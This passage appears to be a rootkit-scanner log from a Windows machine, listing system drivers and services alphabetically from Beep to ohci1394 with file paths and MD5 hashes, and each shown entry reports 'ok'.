14:26:36.0605 1440 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
14:26:36.0623 1440 Beep - ok
14:26:36.0674 1440 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
14:26:36.0682 1440 BFE - ok
14:26:36.0740 1440 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
14:26:36.0767 1440 BITS - ok
14:26:36.0779 1440 blbdrive - ok
14:26:36.0839 1440 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
14:26:36.0849 1440 Bonjour Service - ok
14:26:36.0889 1440 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
14:26:36.0925 1440 bowser - ok
14:26:36.0970 1440 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
14:26:36.0997 1440 BrFiltLo - ok
14:26:37.0057 1440 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
14:26:37.0057 1440 BrFiltUp - ok
14:26:37.0088 1440 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
14:26:37.0104 1440 Browser - ok
14:26:37.0135 1440 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
14:26:37.0166 1440 Brserid - ok
14:26:37.0182 1440 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
14:26:37.0197 1440 BrSerWdm - ok
14:26:37.0213 1440 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
14:26:37.0228 1440 BrUsbMdm - ok
14:26:37.0254 1440 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
14:26:37.0274 1440 BrUsbSer - ok
14:26:37.0314 1440 [ 6D39C954799B63BA866910234CF7D726 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
14:26:37.0334 1440 BthEnum - ok
14:26:37.0364 1440 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
14:26:37.0394 1440 BTHMODEM - ok
14:26:37.0444 1440 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
14:26:37.0464 1440 BthPan - ok
14:26:37.0524 1440 [ 611FF3F2F095C8D4A6D4CFD9DCC09793 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
14:26:37.0564 1440 BTHPORT - ok
14:26:37.0594 1440 [ A4C8377FA4A994E07075107DBE2E3DCE ] BthServ C:\Windows\System32\bthserv.dll
14:26:37.0594 1440 BthServ - ok
14:26:37.0614 1440 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
14:26:37.0634 1440 BTHUSB - ok
14:26:37.0674 1440 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
14:26:37.0684 1440 cdfs - ok
14:26:37.0724 1440 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
14:26:37.0754 1440 cdrom - ok
14:26:37.0794 1440 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
14:26:37.0794 1440 CertPropSvc - ok
14:26:37.0814 1440 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
14:26:37.0824 1440 circlass - ok
14:26:37.0874 1440 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
14:26:37.0904 1440 CLFS - ok
14:26:37.0954 1440 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
14:26:37.0974 1440 clr_optimization_v2.0.50727_32 - ok
14:26:38.0044 1440 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
14:26:38.0064 1440 clr_optimization_v4.0.30319_32 - ok
14:26:38.0094 1440 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
14:26:38.0104 1440 CmBatt - ok
14:26:38.0134 1440 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
14:26:38.0164 1440 cmdide - ok
14:26:38.0194 1440 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
14:26:38.0214 1440 Compbatt - ok
14:26:38.0214 1440 COMSysApp - ok
14:26:38.0224 1440 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
14:26:38.0244 1440 crcdisk - ok
14:26:38.0274 1440 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
14:26:38.0274 1440 Crusoe - ok
14:26:38.0304 1440 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
14:26:38.0314 1440 CryptSvc - ok
14:26:38.0354 1440 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
14:26:38.0364 1440 DcomLaunch - ok
14:26:38.0394 1440 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
14:26:38.0414 1440 DfsC - ok
14:26:38.0504 1440 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
14:26:38.0574 1440 DFSR - ok
14:26:38.0644 1440 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
14:26:38.0644 1440 Dhcp - ok
14:26:38.0674 1440 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
14:26:38.0694 1440 disk - ok
14:26:38.0744 1440 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
14:26:38.0744 1440 Dnscache - ok
14:26:38.0774 1440 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
14:26:38.0794 1440 dot3svc - ok
14:26:38.0844 1440 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
14:26:38.0844 1440 DPS - ok
14:26:38.0874 1440 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
14:26:38.0894 1440 drmkaud - ok
14:26:38.0924 1440 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
14:26:38.0934 1440 DXGKrnl - ok
14:26:38.0954 1440 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
14:26:38.0984 1440 E1G60 - ok
14:26:39.0004 1440 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
14:26:39.0004 1440 EapHost - ok
14:26:39.0044 1440 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
14:26:39.0074 1440 Ecache - ok
14:26:39.0104 1440 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
14:26:39.0134 1440 elxstor - ok
14:26:39.0184 1440 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
14:26:39.0194 1440 EMDMgmt - ok
14:26:39.0224 1440 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
14:26:39.0234 1440 EventSystem - ok
14:26:39.0284 1440 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
14:26:39.0284 1440 exfat - ok
14:26:39.0314 1440 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
14:26:39.0344 1440 fastfat - ok
14:26:39.0384 1440 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
14:26:39.0394 1440 fdc - ok
14:26:39.0424 1440 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
14:26:39.0454 1440 fdPHost - ok
14:26:39.0474 1440 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
14:26:39.0474 1440 FDResPub - ok
14:26:39.0504 1440 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
14:26:39.0554 1440 FileInfo - ok
14:26:39.0585 1440 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
14:26:39.0601 1440 Filetrace - ok
14:26:39.0648 1440 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
14:26:39.0663 1440 flpydisk - ok
14:26:39.0704 1440 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
14:26:39.0734 1440 FltMgr - ok
14:26:39.0804 1440 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
14:26:39.0814 1440 FontCache - ok
14:26:39.0864 1440 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
14:26:39.0894 1440 FontCache3.0.0.0 - ok
14:26:39.0924 1440 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
14:26:39.0954 1440 Fs_Rec - ok
14:26:39.0984 1440 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
14:26:40.0004 1440 gagp30kx - ok
14:26:40.0064 1440 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
14:26:40.0094 1440 GEARAspiWDM - ok
14:26:40.0144 1440 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
14:26:40.0154 1440 gpsvc - ok
14:26:40.0184 1440 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
14:26:40.0234 1440 HBtnKey - ok
14:26:40.0274 1440 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
14:26:40.0284 1440 HdAudAddService - ok
14:26:40.0324 1440 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
14:26:40.0324 1440 HDAudBus - ok
14:26:40.0364 1440 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
14:26:40.0384 1440 HidBth - ok
14:26:40.0414 1440 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
14:26:40.0434 1440 HidIr - ok
14:26:40.0474 1440 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
14:26:40.0474 1440 hidserv - ok
14:26:40.0484 1440 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
14:26:40.0504 1440 HidUsb - ok
14:26:40.0534 1440 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
14:26:40.0534 1440 hkmsvc - ok
14:26:40.0554 1440 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
14:26:40.0584 1440 HpCISSs - ok
14:26:40.0624 1440 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
14:26:40.0654 1440 hpdskflt - ok
14:26:40.0734 1440 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
14:26:40.0734 1440 hpqwmiex - ok
14:26:40.0764 1440 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
14:26:40.0764 1440 hpsrv - ok
14:26:40.0794 1440 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
14:26:40.0824 1440 HTTP - ok
14:26:40.0864 1440 [ 1720966D9C7EA5E2D78B6DB92D2F9171 ] hwdatacard C:\Windows\system32\DRIVERS\ewusbmdm.sys
14:26:40.0904 1440 hwdatacard - ok
14:26:40.0934 1440 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
14:26:40.0954 1440 i2omp - ok
14:26:41.0004 1440 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
14:26:41.0014 1440 i8042prt - ok
14:26:41.0044 1440 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
14:26:41.0074 1440 iaStorV - ok
14:26:41.0154 1440 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
14:26:41.0214 1440 idsvc - ok
14:26:41.0304 1440 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
14:26:41.0384 1440 igfx - ok
14:26:41.0414 1440 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
14:26:41.0444 1440 iirsp - ok
14:26:41.0494 1440 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
14:26:41.0494 1440 IKEEXT - ok
14:26:41.0514 1440 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
14:26:41.0544 1440 intelide - ok
14:26:41.0584 1440 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
14:26:41.0584 1440 intelppm - ok
14:26:41.0624 1440 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
14:26:41.0644 1440 IPBusEnum - ok
14:26:41.0684 1440 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
14:26:41.0694 1440 IpFilterDriver - ok
14:26:41.0714 1440 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
14:26:41.0714 1440 iphlpsvc - ok
14:26:41.0724 1440 IpInIp - ok
14:26:41.0764 1440 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
14:26:41.0764 1440 IPMIDRV - ok
14:26:41.0784 1440 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
14:26:41.0814 1440 IPNAT - ok
14:26:41.0884 1440 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
14:26:41.0894 1440 iPod Service - ok
14:26:41.0914 1440 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
14:26:41.0944 1440 IRENUM - ok
14:26:41.0957 1440 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
14:26:41.0980 1440 isapnp - ok
14:26:42.0012 1440 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
14:26:42.0013 1440 iScsiPrt - ok
14:26:42.0031 1440 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
14:26:42.0038 1440 iteatapi - ok
14:26:42.0063 1440 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
14:26:42.0082 1440 iteraid - ok
14:26:42.0119 1440 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
14:26:42.0141 1440 kbdclass - ok
14:26:42.0171 1440 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
14:26:42.0188 1440 kbdhid - ok
14:26:42.0216 1440 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
14:26:42.0217 1440 KeyIso - ok
14:26:42.0258 1440 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
14:26:42.0298 1440 KSecDD - ok
14:26:42.0339 1440 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
14:26:42.0345 1440 KtmRm - ok
14:26:42.0371 1440 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
14:26:42.0375 1440 LanmanServer - ok
14:26:42.0419 1440 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
14:26:42.0423 1440 LanmanWorkstation - ok
14:26:42.0448 1440 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
14:26:42.0476 1440 lltdio - ok
14:26:42.0513 1440 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
14:26:42.0539 1440 lltdsvc - ok
14:26:42.0574 1440 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
14:26:42.0576 1440 lmhosts - ok
14:26:42.0610 1440 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
14:26:42.0640 1440 LSI_FC - ok
14:26:42.0649 1440 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
14:26:42.0682 1440 LSI_SAS - ok
14:26:42.0715 1440 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
14:26:42.0753 1440 LSI_SCSI - ok
14:26:42.0798 1440 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
14:26:42.0837 1440 Ltn_stk7070P - ok
14:26:42.0866 1440 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
14:26:42.0894 1440 Ltn_stkrc - ok
14:26:42.0915 1440 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
14:26:42.0917 1440 luafv - ok
14:26:42.0958 1440 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
14:26:42.0989 1440 megasas - ok
14:26:43.0011 1440 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
14:26:43.0015 1440 MMCSS - ok
14:26:43.0045 1440 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
14:26:43.0046 1440 Modem - ok
14:26:43.0078 1440 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
14:26:43.0080 1440 monitor - ok
14:26:43.0094 1440 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
14:26:43.0137 1440 mouclass - ok
14:26:43.0170 1440 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
14:26:43.0198 1440 mouhid - ok
14:26:43.0230 1440 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
14:26:43.0258 1440 MountMgr - ok
14:26:43.0327 1440 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
14:26:43.0356 1440 MozillaMaintenance - ok
14:26:43.0404 1440 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
14:26:43.0441 1440 mpio - ok
14:26:43.0482 1440 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
14:26:43.0513 1440 mpsdrv - ok
14:26:43.0554 1440 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
14:26:43.0563 1440 MpsSvc - ok
14:26:43.0580 1440 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
14:26:43.0611 1440 Mraid35x - ok
14:26:43.0640 1440 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
14:26:43.0679 1440 MRxDAV - ok
14:26:43.0707 1440 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
14:26:43.0739 1440 mrxsmb - ok
14:26:43.0764 1440 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
14:26:43.0820 1440 mrxsmb10 - ok
14:26:43.0820 1440 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
14:26:43.0835 1440 mrxsmb20 - ok
14:26:43.0882 1440 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
14:26:43.0898 1440 msahci - ok
14:26:43.0944 1440 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
14:26:43.0964 1440 msdsm - ok
14:26:44.0004 1440 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
14:26:44.0044 1440 MSDTC - ok
14:26:44.0104 1440 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
14:26:44.0124 1440 Msfs - ok
14:26:44.0154 1440 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
14:26:44.0164 1440 msisadrv - ok
14:26:44.0184 1440 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
14:26:44.0224 1440 MSiSCSI - ok
14:26:44.0224 1440 msiserver - ok
14:26:44.0264 1440 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
14:26:44.0264 1440 MSKSSRV - ok
14:26:44.0284 1440 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
14:26:44.0294 1440 MSPCLOCK - ok
14:26:44.0304 1440 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
14:26:44.0324 1440 MSPQM - ok
14:26:44.0374 1440 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
14:26:44.0414 1440 MsRPC - ok
14:26:44.0444 1440 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
14:26:44.0444 1440 mssmbios - ok
14:26:44.0454 1440 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
14:26:44.0474 1440 MSTEE - ok
14:26:44.0494 1440 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
14:26:44.0534 1440 Mup - ok
14:26:44.0564 1440 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
14:26:44.0574 1440 napagent - ok
14:26:44.0614 1440 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
14:26:44.0624 1440 NativeWifiP - ok
14:26:44.0674 1440 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
14:26:44.0684 1440 NDIS - ok
14:26:44.0704 1440 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
14:26:44.0724 1440 NdisTapi - ok
14:26:44.0754 1440 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
14:26:44.0774 1440 Ndisuio - ok
14:26:44.0794 1440 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
14:26:44.0824 1440 NdisWan - ok
14:26:44.0864 1440 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
14:26:44.0884 1440 NDProxy - ok
14:26:44.0914 1440 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
14:26:44.0934 1440 NetBIOS - ok
14:26:44.0964 1440 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
14:26:44.0968 1440 netbt - ok
14:26:44.0982 1440 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
14:26:44.0985 1440 Netlogon - ok
14:26:45.0018 1440 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
14:26:45.0023 1440 Netman - ok
14:26:45.0039 1440 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
14:26:45.0043 1440 netprofm - ok
14:26:45.0081 1440 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
14:26:45.0094 1440 NetTcpPortSharing - ok
14:26:45.0204 1440 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
14:26:45.0346 1440 NETw5v32 - ok
14:26:45.0372 1440 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
14:26:45.0398 1440 nfrd960 - ok
14:26:45.0438 1440 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
14:26:45.0442 1440 NlaSvc - ok
14:26:45.0468 1440 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
14:26:45.0494 1440 Npfs - ok
14:26:45.0522 1440 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
14:26:45.0525 1440 nsi - ok
14:26:45.0548 1440 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
14:26:45.0575 1440 nsiproxy - ok
14:26:45.0641 1440 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
14:26:45.0683 1440 Ntfs - ok
14:26:45.0717 1440 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
14:26:45.0738 1440 ntrigdigi - ok
14:26:45.0770 1440 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
14:26:45.0794 1440 Null - ok
14:26:45.0819 1440 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
14:26:45.0842 1440 nvraid - ok
14:26:45.0882 1440 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
14:26:45.0890 1440 nvstor - ok
14:26:45.0929 1440 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
14:26:45.0949 1440 nv_agp - ok
14:26:45.0956 1440 NwlnkFlt - ok
14:26:45.0964 1440 NwlnkFwd - ok
14:26:46.0001 1440 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
